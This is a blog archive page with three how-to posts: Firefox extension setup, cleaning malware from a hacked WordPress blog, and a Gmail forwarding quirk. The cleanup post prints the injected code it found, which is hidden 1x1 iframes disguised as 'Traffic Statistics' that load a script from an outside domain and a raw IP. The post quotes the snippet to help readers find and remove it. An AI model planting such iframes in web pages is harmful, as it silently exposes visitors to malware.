Category Archives: Blog

Academic Papers Artwork baby names Blog blogging democracy Design ethics Facebook firefox Flickr folksonomies Google Google Docs Google Spreadsheets how-to information-architecture information-retrieval information design internet iphone journalism listserv mailing list maps mass media Online News Papers Photography plugin poll social-bookmarking social networking social software spam tagging trust Twitter Usability web-development Web2.0 webspam web standards WordPress Writing

Setting up a Firefox extension development environment

Blog, Programming, , , , , , ,

Procrastato, a Firefox productivity extension I have a Firefox extension called Procrastato.  It reminds you to get back to work when you’re mindlessly surfing the web.  Procrastato is a very simple add-on but I’ve found that getting started in developing Firefox add-ons isn’t so simple.

Although I’ve just dipped my feet into the world of XUL and Firefox Extension development I thought I would share what I’ve been using to get up and running.

First things first – take a look at the Building an Extension page at Mozilla.org.  Make sure you at least read through that page before getting started.  It can be a little disappointing to see how much you need to have in place in order to do a simple “hello world” test extension, but it’s worth getting an overall picture before jumping in.

Also, before getting to “hello world,” there are a couple of extensions that are useful for developing extensions:

If you’ve used Eclipse for Java or PHP development you’ll probably want to use it for extension development with the XulBooster plugin.  XulBooster is useful for two reasons:

  1. It helps with housekeeping chores like setting up your install.rdf and chrome.manifest and exporting a .xpi package.
  2. It give you some code coloring and syntax highlighting for those .xul files.

Now you should be ready to go.

A couple of notes:XulBooster will automatically include an empty <em:updateURL/> element in your install.rdf.  If you don’t have a secure URL for updates (starting with https://), you might get this warning from addons.mozilla.org when you try to upload your new version:

Add-ons cannot use an external updateURL. Please remove this from install.rdf and try again.

Just open the install.rdf file and deleted that line to solve the problem.

Fixing a ‘This site may harm your computer’ warning, part 2: Hidden iFrames

Blog, , , , , , , , , ,

Earlier I wrote about what I did when my WordPress blog started returning a “This site may harm your computer” warning in Google and Firefox. Just to recap, these are the first steps to take to fix the problem:

  1. Plug the hole – update WordPress (or your blog, forum, or CMS software) to plug any security holes.
  2. Repair the damage – search for spammy outgoing links or malware files on your pages and delete them.
  3. Clear your good name – request a review by StopBadware.org and in Google Webmaster Tools.

This is the right process to follow, but it turns out that I was a bit premature in doing step 3. Spammers and spyware spreaders are a wily, unpredictable bunch and they can’t be expected to stick to simple tactics like inserting links into posts.

The other tactic they used on my site was inserting invisible iFrames. These are harder to find because there aren’t as many automated tools to find them (or, at least, I don’t know of any) so it takes some manual searching through your source code. Here’s what the malware code looked like:


<!-- Traffic Statistics --> <iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->

<noscript></noscript> <iframe src=”http://61.132.75.71/iframe/wp-stats.php” frameborder=”0″ height=”1″ width=”1″></iframe><br />
<!– End Traffic Statistics –>

It looks like others have run into the same issue. Your anti-virus software may even give you a warning about a virus in a file named “wp-stats[1].htm.” In my case AVG Antvirus warned me about a trojan horse in my temp folder.

Once I removed the iframes, I resubmitted my request in Google Webmaster Tools. Here’s another helpful hint that took me a while to figure out: If only part of your site has been hacked and is marked in StopBadware.org’s database, you should Add that subdirectory as a new site in Webmaster Tools. Here’s an illustration (click to see full size):

webmaster-tools-subdir

In this screenshot you can see my main site, www.jasonmorrison.net. If I click there I don’t see any warning about spam or viruses in my blog at www.jasonmorrison.net/content. So I just added my blog as a new “site” and there I could see the warnings and make a reconsideration request.

One last thing: Google may send out an email to try to let you know about these sorts of problems. I never saw these emails, though, since they go to addresses like abuse@yourdomain.com and admin@yourdomain.comthat spammers also like to use. They ended up in my spam bucket. So you might want to whitelist email from google.com.

Next in part three I’ll talk about what to do when a whole subdomain (perhaps with a forum) is filled with spam. Please put questions or additional suggestions in the comments below.

Tricky little issue in Gmail – how do you find the original sender of a forward?

Blog, , , , , , , ,

DSCN9755 I ran across a confusing issue in Gmail and I’d like to share what I did to resolve it.  It seems that Gmail won’t show you the original sender of a forwarded email by default in many cases.  Here’s how I found the issue and what I did to correct it.

My wife and I have a shared blog that automatically sends out updates to subscribers via Feedburner.  Feedburner is a great service if you have a blog, and you can use it to subscribe to my feed and get updates when I write on this blog as well.

When friends and family reply to an email from Feedburner, it goes to my email address and I need to forward it to my wife so she can read it too.  I use Mozilla Thunderbird as my email client so it’s easy to set up a filter to do it automatically (look under Tools –> Message Filters).  But when the forwarded email showed up in my wife’s Gmail inbox, it showed only me as the sender – with no mention of the original sender, so she couldn’t tell who was replying to our blog.

Gmail does let you see the original full text of the message – there’s a little down arrow next to Reply with a menu that includes “show original.”  Email headers are hardly user-friendly, though, so that’s not a very good solution.

It turns out that Gmail shows the name of the forwarder, not the name of the original sender, on forwards that are sent as an attachment.  If the forward was sent inline it’s easy to see the original sender in the body of the mail.  By default, Thunderbird sends forwards as attachments and I think Outlook has a similar default… in any event this is pretty common behavior.

To fix it from my end I went in Thunderbird, to Tools-> Options and selected the Composition icon.  Under the General tab, I changed Forward Messages to “Inline.”  This does the trick.

It would be nice, however, if Gmail made this a little more apparent in the user interface.  Maybe saying something like “[forwarder name] forwarding from [original sender name].”  Or it could be worked into the way conversations are viewed as threads.

This may not be a very common issue, so it might not warrant a change to Gmail, but it’s a small enough usability tweak that it might be worth it.  Hopefully you found this post helpful.